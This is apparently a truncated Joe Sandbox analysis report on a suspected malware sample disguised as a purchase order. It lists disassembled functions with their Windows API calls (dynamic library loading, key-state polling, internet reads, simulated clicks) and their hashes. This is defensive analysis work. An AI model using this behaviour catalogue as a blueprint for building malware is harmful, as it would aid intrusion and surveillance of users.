                          • Opcode Fuzzy Hash: 9877d0a328fddc6689d3dabe18b9a83777149f5260702f971306f4b27775589f
                          • Instruction Fuzzy Hash: 9C516CB5A00619EFCB14CF58C894AAAB7F4FF89350B158559F905DB350E730E912CFA0
                          Function 00F78AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                          Download Yara Rule
                          APIs
                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F78BAE
                          • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00F78BDA
                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F78C32
                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F78C57
                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F78C5F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: PrivateProfile$SectionWrite$String
                          • String ID:
                          • API String ID: 2832842796-0
                          • Opcode ID: 93a9e8cde47ae6d2c94462f73d7a89e7a81822dd5ae8fac33fa849999ebb06b3
                          • Instruction ID: 4ac59d30e58278c361bc5fa3d89c275c765843c5b914c7a0e0759a108aaa4479
                          • Opcode Fuzzy Hash: 93a9e8cde47ae6d2c94462f73d7a89e7a81822dd5ae8fac33fa849999ebb06b3
                          • Instruction Fuzzy Hash: 75515E35A002159FCB01DF64CC85AA9BBF5FF48314F08C499E849AB3A2DB35ED51EB91
                          Function 00F88EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00F88F40
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00F88FD0
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F88FEC
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00F89032
                          • FreeLibrary.KERNEL32(00000000), ref: 00F89052
                            • Part of subcall function 00F1F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00F71043,?,753CE610), ref: 00F1F6E6
                            • Part of subcall function 00F1F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00F5FA64,00000000,00000000,?,?,00F71043,?,753CE610,?,00F5FA64), ref: 00F1F70D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                          • String ID:
                          • API String ID: 666041331-0
                          • Opcode ID: 5e6fc5ae820779cc71548c7cc7c4941f1f8be38820894429af47e326043000f3
                          • Instruction ID: 883855bceaf5856ee3c9a336d13ade196f1ea2e1652caa95fba4bd7c637319c6
                          • Opcode Fuzzy Hash: 5e6fc5ae820779cc71548c7cc7c4941f1f8be38820894429af47e326043000f3
                          • Instruction Fuzzy Hash: 2A514F35A04205DFC711EF64C8848EDBBF1FF49324B488099E9169B362DB75ED86EB90
                          Function 00F96B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                          Download Yara Rule
                          APIs
                          • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00F96C33
                          • SetWindowLongW.USER32(?,000000EC,?), ref: 00F96C4A
                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00F96C73
                          • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00F7AB79,00000000,00000000), ref: 00F96C98
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00F96CC7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$Long$MessageSendShow
                          • String ID:
                          • API String ID: 3688381893-0
                          • Opcode ID: 80788799e54c8a385a75ac113bdb6cacd47d85dd257576bb89e2c267e9cda9c9
                          • Instruction ID: 7e1befc1f422dc6840596930471956df9f73fa52cb42f5df84807ba9d0a12bac
                          • Opcode Fuzzy Hash: 80788799e54c8a385a75ac113bdb6cacd47d85dd257576bb89e2c267e9cda9c9
                          • Instruction Fuzzy Hash: 8D41C335A04104AFEF24DF38CC58FA97BA5EB49361F150229F899E72E0D371ED41EA90
                          Function 00F32051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: 4b09529af804afc191adaa3c621923ef1dbb6a7c8aa536d3b75a7ed919795336
                          • Instruction ID: b49c726081bcd0c3d864500bbdeff2bc0779d45231e3887d08df76a00d647c62
                          • Opcode Fuzzy Hash: 4b09529af804afc191adaa3c621923ef1dbb6a7c8aa536d3b75a7ed919795336
                          • Instruction Fuzzy Hash: B041E272E00204AFCB24DF78C981A5EB3B5EF88720F1545A9E516EB351DB31AD01EB80
                          Function 00F1912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetCursorPos.USER32(?), ref: 00F19141
                          • ScreenToClient.USER32(00000000,?), ref: 00F1915E
                          • GetAsyncKeyState.USER32(00000001), ref: 00F19183
                          • GetAsyncKeyState.USER32(00000002), ref: 00F1919D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: AsyncState$ClientCursorScreen
                          • String ID:
                          • API String ID: 4210589936-0
                          • Opcode ID: 5d78c88784a0cbf77e77c8d2eb520a5945c742c0cb4a5d7fd9d6460ba7b8759f
                          • Instruction ID: 82862449ffe1ea83bf7f897728f4925152dfe57cc0cead5191b14dd1958f36ec
                          • Opcode Fuzzy Hash: 5d78c88784a0cbf77e77c8d2eb520a5945c742c0cb4a5d7fd9d6460ba7b8759f
                          • Instruction Fuzzy Hash: 4741707190860ABBDF09AF64D858BEEB774FB05334F204215E925A32D0C7746994EF91
                          Function 00F73874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetInputState.USER32 ref: 00F738CB
                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00F73922
                          • TranslateMessage.USER32(?), ref: 00F7394B
                          • DispatchMessageW.USER32(?), ref: 00F73955
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F73966
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                          • String ID:
                          • API String ID: 2256411358-0
                          • Opcode ID: bd01c3321c9231c09ade8c6ff4014c03bd6d900a5befbd957146425b55353fad
                          • Instruction ID: e72a8f1077de2483a7c2e24997198eb2235f6ad54322746084d92a69dae80e7a
                          • Opcode Fuzzy Hash: bd01c3321c9231c09ade8c6ff4014c03bd6d900a5befbd957146425b55353fad
                          • Instruction Fuzzy Hash: 0E31F971D05349BEEB35CB34DC08BB637B6AB05310F04856FD55A82190D3B59684FB53
                          Function 00F7CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                          Download Yara Rule
                          APIs
                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00F7CF38
                          • InternetReadFile.WININET(?,00000000,?,?), ref: 00F7CF6F
                          • GetLastError.KERNEL32(?,00000000,?,?,?,00F7C21E,00000000), ref: 00F7CFB4
                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,00F7C21E,00000000), ref: 00F7CFC8
                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,00F7C21E,00000000), ref: 00F7CFF2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                          • String ID:
                          • API String ID: 3191363074-0
                          • Opcode ID: 7ca08b312c12239eeaddb1caee380682455ea28222926d812bab7a9eafe856c3
                          • Instruction ID: 8511d5064aa1aedfcaa7fee7d8b3bb7be8853f6ae15a562add5a176e33e940a7
                          • Opcode Fuzzy Hash: 7ca08b312c12239eeaddb1caee380682455ea28222926d812bab7a9eafe856c3
                          • Instruction Fuzzy Hash: F3314F71900605AFDB20DFA5D884AEBBBF9EB14360B10842FF51AD2141D730AE45EBB1
                          Function 00F61901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00F61915
                          • PostMessageW.USER32(00000001,00000201,00000001), ref: 00F619C1
                          • Sleep.KERNEL32(00000000,?,?,?), ref: 00F619C9
                          • PostMessageW.USER32(00000001,00000202,00000000), ref: 00F619DA
                          • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00F619E2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessagePostSleep$RectWindow
                          • String ID:
                          • API String ID: 3382505437-0
                          • Opcode ID: 335347565fea5bcf8b2ea472aa33b0eaabd0908604f47df6bc4a4f0751836218
                          • Instruction ID: 8fd8a43a08fb49cab0434ec50f5d2868a072a49e9951c93dd6d489e2a3463724
                          • Opcode Fuzzy Hash: 335347565fea5bcf8b2ea472aa33b0eaabd0908604f47df6bc4a4f0751836218
                          • Instruction Fuzzy Hash: C331C072A0021DEFCB10CFA8CD99ADE3BB5FB05325F144229FA25A72D1C7709954EB90
                          Function 00F95706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F95745
                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F9579D
                          • _wcslen.LIBCMT ref: 00F957AF
                          • _wcslen.LIBCMT ref: 00F957BA
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F95816
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$_wcslen
                          • String ID:
                          • API String ID: 763830540-0
                          • Opcode ID: b46fbf0e4f34d77056682c777560d8f525d4d55290f98bab18bf2417c7e9a8c9
                          • Instruction ID: 9d2aef43cd2b20adfc0751f40dc4c1faa8f20c2f9744d7e98cd545e27c645edf
                          • Opcode Fuzzy Hash: b46fbf0e4f34d77056682c777560d8f525d4d55290f98bab18bf2417c7e9a8c9
                          • Instruction Fuzzy Hash: B421A771D046189AEF21DFA4DC44AED7778FF04B20F104216EA29DA180D7709A85EF51
                          Function 00F80930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          • IsWindow.USER32(00000000), ref: 00F80951
                          • GetForegroundWindow.USER32 ref: 00F80968
                          • GetDC.USER32(00000000), ref: 00F809A4
                          • GetPixel.GDI32(00000000,?,00000003), ref: 00F809B0
                          • ReleaseDC.USER32(00000000,00000003), ref: 00F809E8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$ForegroundPixelRelease
                          • String ID:
                          • API String ID: 4156661090-0
                          • Opcode ID: 6a5116b141c0db465f6015e69ad4070a8db8d8bb349ff633e8649648cd01c176
                          • Instruction ID: e8dcbc96fc86b493a13e2555edc35186c0df926f18853257120b407341fce94a
                          • Opcode Fuzzy Hash: 6a5116b141c0db465f6015e69ad4070a8db8d8bb349ff633e8649648cd01c176
                          • Instruction Fuzzy Hash: 9B218136600204AFD714EF69CC84AAEBBE5EF48700F048069F85A97362DB34AC44EB90
                          Function 00F3CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                          Download Yara Rule
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 00F3CDC6
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F3CDE9
                            • Part of subcall function 00F33820: RtlAllocateHeap.NTDLL(00000000,?,00FD1444,?,00F1FDF5,?,?,00F0A976,00000010,00FD1440,00F013FC,?,00F013C6,?,00F01129), ref: 00F33852
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F3CE0F
                          • _free.LIBCMT ref: 00F3CE22
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F3CE31
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                          • String ID:
                          • API String ID: 336800556-0
                          • Opcode ID: f23b51e574e6826365fb3e866142cc3e13167fd9402deb6530468ab9669c686e
                          • Instruction ID: 7f6627771b798f5fd971a99f78eccda206fb3ee143eb63dd190001a47ec67e34
                          • Opcode Fuzzy Hash: f23b51e574e6826365fb3e866142cc3e13167fd9402deb6530468ab9669c686e
                          • Instruction Fuzzy Hash: 04018472A022197F232127BA6C88D7B796DDEC6BB1B15012AF905E7201EA658D41B2F0
                          Function 00F19639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                          Download Yara Rule
                          APIs
                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F19693
                          • SelectObject.GDI32(?,00000000), ref: 00F196A2
                          • BeginPath.GDI32(?), ref: 00F196B9
                          • SelectObject.GDI32(?,00000000), ref: 00F196E2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ObjectSelect$BeginCreatePath
                          • String ID:
                          • API String ID: 3225163088-0
                          • Opcode ID: 8f0720a0316087a45bcf7f7d68b1991bbb360d159c98d82e66feea455bbcaaee
                          • Instruction ID: 5816bbb35734ebcf8953e54fa2341495744a6df9eb2a03315949fb30727e64ed
                          • Opcode Fuzzy Hash: 8f0720a0316087a45bcf7f7d68b1991bbb360d159c98d82e66feea455bbcaaee
                          • Instruction Fuzzy Hash: 63214F71906309EBDB119F64EC247E97BAABB50365F100217F810A61B1D3B058D5FFE6
                          Function 00F65711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _memcmp
                          • String ID:
                          • API String ID: 2931989736-0
                          • Opcode ID: 9e68923f695ecf4e8d1d2c5c73980e84cc908c7e317019d2851782a9c5ab4335
                          • Instruction ID: 3b9241c8add2b210cb6d9da315d0a88cd81bd3838e08d1e96d606416c8baf0d6
                          • Opcode Fuzzy Hash: 9e68923f695ecf4e8d1d2c5c73980e84cc908c7e317019d2851782a9c5ab4335
                          • Instruction Fuzzy Hash: 8301B562A4161DBBE6089510AD82FBB735DAB71BB4F004020FD04BE641F765ED24B2E5
                          Function 00F32DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,?,?,00F2F2DE,00F33863,00FD1444,?,00F1FDF5,?,?,00F0A976,00000010,00FD1440,00F013FC,?,00F013C6), ref: 00F32DFD
                          • _free.LIBCMT ref: 00F32E32
                          • _free.LIBCMT ref: 00F32E59
                          • SetLastError.KERNEL32(00000000,00F01129), ref: 00F32E66
                          • SetLastError.KERNEL32(00000000,00F01129), ref: 00F32E6F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorLast$_free
                          • String ID:
                          • API String ID: 3170660625-0
                          • Opcode ID: 94e3a229b25fa3aa3fe479c74b5a957ade7bcf42dc8612bf9f200a9577a1702d
                          • Instruction ID: c7fb98f0df8e58f5ec00677305bb0f0a330fc86be8f0b3b830c422d6b89decc4
                          • Opcode Fuzzy Hash: 94e3a229b25fa3aa3fe479c74b5a957ade7bcf42dc8612bf9f200a9577a1702d
                          • Instruction Fuzzy Hash: 120128326056046BC65267797C87E2F366EABC17B1F250029F425A32D2EF78CC8170A0
                          Function 00F6000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                          Download Yara Rule
                          APIs
                          • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F5FF41,80070057,?,?,?,00F6035E), ref: 00F6002B
                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F5FF41,80070057,?,?), ref: 00F60046
                          • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F5FF41,80070057,?,?), ref: 00F60054
                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F5FF41,80070057,?), ref: 00F60064
                          • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F5FF41,80070057,?,?), ref: 00F60070
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: From$Prog$FreeStringTasklstrcmpi
                          • String ID:
                          • API String ID: 3897988419-0
                          • Opcode ID: 9a4506ab40ed5ccf81425700296f270907cb24ec9e7c2febe46694a5eb65c662
                          • Instruction ID: b2bfa6dd865f0ac923e515e307290935b9694f233324fa59e0e7110f1e76f8aa
                          • Opcode Fuzzy Hash: 9a4506ab40ed5ccf81425700296f270907cb24ec9e7c2febe46694a5eb65c662
                          • Instruction Fuzzy Hash: E701A272600208BFDB104F68DC04BAB7AEDEF847A1F244125F905D2210DB71DD40BBA0
                          Function 00F6E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                          Download Yara Rule
                          APIs
                          • QueryPerformanceCounter.KERNEL32(?), ref: 00F6E997
                          • QueryPerformanceFrequency.KERNEL32(?), ref: 00F6E9A5
                          • Sleep.KERNEL32(00000000), ref: 00F6E9AD
                          • QueryPerformanceCounter.KERNEL32(?), ref: 00F6E9B7
                          • Sleep.KERNEL32 ref: 00F6E9F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
